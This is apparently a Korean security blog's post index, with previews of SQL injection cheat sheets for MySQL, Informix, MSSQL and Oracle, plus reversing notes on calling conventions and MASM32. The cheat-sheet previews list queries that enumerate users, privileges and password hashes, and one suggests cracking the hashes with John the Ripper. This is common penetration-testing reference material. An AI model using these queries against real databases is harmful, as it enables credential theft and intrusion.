본문 바로가기

전체 글52

MySQL SQL Injection Cheat Sheet Version SELECT @@version Comments SELECT 1; #comment SELECT /*comment*/1; Current User SELECT user(); SELECT system_user(); List Users SELECT user FROM mysql.user; — priv List Password Hashes SELECT host, user, password FROM mysql.user; — priv Password Cracker John the Ripper will crack MySQL password hashes. List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.us.. 2015. 4. 14.
Informix SQL Injection Cheat Sheet Informix SQL Injection Cheat Sheet Version SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-b.. 2015. 2. 27.
MSSQL SQL injection cheat sheet Version SELECT @@version Comments SELECT 1 — comment SELECT /*comment*/1 Current User SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID List Users SELECT name FROM master..syslogins List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master... 2014. 11. 18.
Oracle SQL Injection Cheat Sheet Oracle SQL Injection Cheat Sheet Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; Comments SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. Current User SELECT us.. 2014. 11. 14.
[Reversing] __cdecl과 __stdcall의 차이점 __cdecl과 __stdcall의 차이점 __cdecl과 __stdcall의 가장 큰 차이점은 스택 정리 주체가 누구인가하는 점인데 사실 이 차이점이 컴파일된 결과 코드에 미치는 영향은 별로 없다. 스택 정리 주체와는 상관없이 스택은 항상 호출 전의 상태로 복구되며 프로그램의 동작도 완전히 동일하다. 실행 속도는 거의 차이가 없으며 프로그램의 크기는 비록 무시할만한 수준이기는 하지만 __stdcall이 조금 더 작다. 왜냐하면 함수를 여러 번 호출하더라도 스택을 정리하는 코드는 함수 끝의 접미에 딱 한 번만 작성되기 때문이다. 반면 __cdecl은 호출원이 스택을 정리하므로 호출할 때마다 정리 코드가 반복되어 프로그램 크기가 조금 더 커진다. 또 다른 중요한 차이점은 가변 인수 함수를 만들 수 있는가 .. 2011. 1. 20.
[Reversing] MASM32 Install and *.asm files compile [MASM32 install] http://www.masm32.com 홈페이지에서 masm32 다운로드 받고 설치한다. 설치 후 masm32\bin, masm32\lib 를 환경변수에 등록해 준다. [*.asm파일 컴파일 하기] Compile : cmd창을 오픈 c:\masm32\bin\ml.exe /c /coff /Zi 파일명.asm ml명령어가 실행되고 나면 .obj파일이 생성된다. Linking : c:\masm32\bin\link.exe /subsystem:windows 파일명.obj 2011. 1. 19.